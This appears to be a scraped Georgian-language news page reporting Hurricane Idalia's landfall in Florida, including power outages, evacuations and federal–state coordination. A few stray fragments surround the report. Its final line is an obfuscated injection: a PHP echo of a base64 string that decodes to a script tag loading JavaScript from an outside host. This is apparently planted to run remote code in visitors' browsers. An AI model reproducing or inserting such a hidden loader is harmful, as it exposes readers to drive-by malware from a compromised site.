celsiusi
ავერსი შნაიდერი

CNN- ის ინფორმაციით, ფლორიდის დასავლეთ სანაპიროს ქარიშხალი „იდალია“ დაატყდა თავს. შტატის სანაპიროსთან მიახლოებისას ქარიშხალი სიმძლავრე მესამე კატეგორიის იყო. მოგვიანებით კი  „იდალიის“ სიმძლავრე მეორე კატეგორიამდე შემცირდა. ამჯამად, ქარის სიჩქარე საათში 110 მილს აღწევს.

ფლორიდის მექსიკის ყურის სანაპიროზე 230 ათასზე მეტი ადამიანი ელექტროენერგიის გარეშეა დარჩენილი. ფლორიდის ოლქების ნაწილში, სანაპირო დასახლებებში მოსახლეობის სავალდებულო ევაკუაცია განხორციელდა. გამოცხადებულია ტორნადოს საფრთხეც.

აშშ-ის პრეზიდენტი ჯო ბაიდენი აცხადებს, რომ ფლორიდის გუბერნატორთან, რონ დესანტისთან მუდმივ კონტაქტზეა და პრეზიდენტის ადმინისტრაცია უზრუნველყოფს მას ყველაფრით, რაც სჭირდება.

ავტორი
მირანდა შურღაია
701
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");